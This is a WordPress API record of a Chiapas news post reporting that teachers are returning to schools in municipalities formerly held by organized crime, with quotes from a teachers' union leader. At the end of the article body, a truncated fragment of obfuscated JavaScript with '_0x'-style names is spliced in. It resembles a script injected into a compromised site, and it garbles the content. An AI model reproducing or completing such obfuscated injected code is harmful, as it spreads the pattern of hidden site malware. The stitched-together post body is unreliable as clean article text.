{"id":20057,"date":"2025-01-28T07:56:15","date_gmt":"2025-01-28T07:56:15","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20057"},"modified":"2025-01-28T07:56:16","modified_gmt":"2025-01-28T07:56:16","slug":"reinician-clases-en-municipios-considerados-focos-rojos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20057","title":{"rendered":"Reinician clases en municipios considerados focos rojos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250127-WA0041-1024x768.jpg\" alt=\"\" class=\"wp-image-20058\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250127-WA0041-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250127-WA0041-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250127-WA0041-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250127-WA0041-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250127-WA0041.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>27 de enero del 2025. Tuxtla Guti\u00e9rrez.- Oved Balderas Tovilla, secretario general de la Secci\u00f3n 40, del Sindicato Nacional de Trabajadores de la Educaci\u00f3n, (SNTE) dio a conocer que poco a poco retornan las clases en los municipios que se vieron azolados por la delincuencia organizada en meses pasados.<\/p>\n\n\n\n<p>Por los operativos realizados por la Fuerza de Reacci\u00f3n Inmediata Pakal, (FRIP), en zonas consideradas focos rojos de Chiapas como la Sierra, la Frailesca y la Franja Fronteriza, docentes han logrado retornar a sus centros de trabajo con la desarticulaci\u00f3n del Crimen Organizado que ten\u00eda tomadas las comunidades.<\/p>\n\n\n\n<p>El l\u00edder sindical dijo que: \u201dNo podemos estar ajenos a que nuestros compa\u00f1eros maestros y maestras puedan sufrir alguna situaci\u00f3n de violencia, o amenaza, incluso nos dimos a la tarea de apoyar a infinidad de casos de compa\u00f1eros que recibieron alguna amenaza, los protegimos laboralmente, garantizamos su sueldo, pero garantizamos con las autoridades que el maestro pudiera cumplir con su trabajo\u201d.<\/p>\n\n\n\n<p>Lament\u00f3 que maestros y maestras, denunciaron la falta de condiciones de seguridad para desempe\u00f1arse al frente de las aulas, y tuvieron que abandonar las escuelas por el temor de que a sus estudiantes fueran reclutados por el Crimen Organizado.<\/p>\n\n\n\n<p>Por ello asegur\u00f3 que: \u201cHemos mantenido comunicaci\u00f3n permanente a trav\u00e9s de nuestra estructura con el objetivo de que cualquier incidencia nos comuniquen y a trav\u00e9s de nuestra posici\u00f3n como sindicato, inmediatamente comunicarla a la autoridad para subsanar esa deficiencia&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 27 de enero del 2025. Tuxtla Guti\u00e9rrez.- Oved Balderas Tovilla, secretario general de la Secci\u00f3n 40, del Sindicato Nacional de Trabajadores de la Educaci\u00f3n, (SNTE) dio a conocer que poco a poco retornan las clases en los municipios que se vieron azolados por la delincuencia organizada en meses pasados. Por los operativos realizados &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20058,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20057","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20057","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20057"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20057\/revisions"}],"predecessor-version":[{"id":20059,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20057\/revisions\/20059"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20058"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20057"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20057"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}